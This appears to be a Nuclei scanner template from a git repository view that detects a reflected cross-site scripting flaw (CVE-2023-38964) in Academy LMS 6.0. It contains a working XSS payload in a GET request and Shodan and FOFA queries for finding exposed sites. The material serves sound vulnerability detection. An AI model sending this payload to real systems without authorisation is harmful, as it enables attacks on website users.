nuclei-templates/http/cves/2023/CVE-2023-38964.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

2024-04-30 09:16:55 +00:00
id: CVE-2023-38964
info:
name: Academy LMS 6.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Apply the latest security patches provided by the vendor to mitigate the XSS vulnerability in Creative Item Academy LMS 6.0.
reference:
- https://vida03.gitbook.io/redteam/web/cve-2023-38964
- https://nvd.nist.gov/vuln/detail/CVE-2023-38964
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38964
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00071
epss-percentile: 0.30433
2024-04-30 09:16:55 +00:00
cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: creativeitem
product: academy_lms
2024-05-31 19:23:20 +00:00
shodan-query: http.html:"academy lms"
fofa-query:
- body="Academy LMS"
- body="academy lms"
2024-04-30 09:16:55 +00:00
tags: cve2023,cve,academylms,xss,creativeitem
http:
- method: GET
path:
- '{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "<svg onload=alert(document.domain)>", "All courses</span>")'
condition: and
# digest: 4a0a00473045022100e604c0ad2fcb45b147262455b08d0bf158d5cc71cabb5a521fd1cb050c959ff802204279a912eb299e0c11b5b2ab85bcfe0464dad43cda5f4b9ca6fa37f3d49b1be1:922c64590222798bb761d5b6d8e72950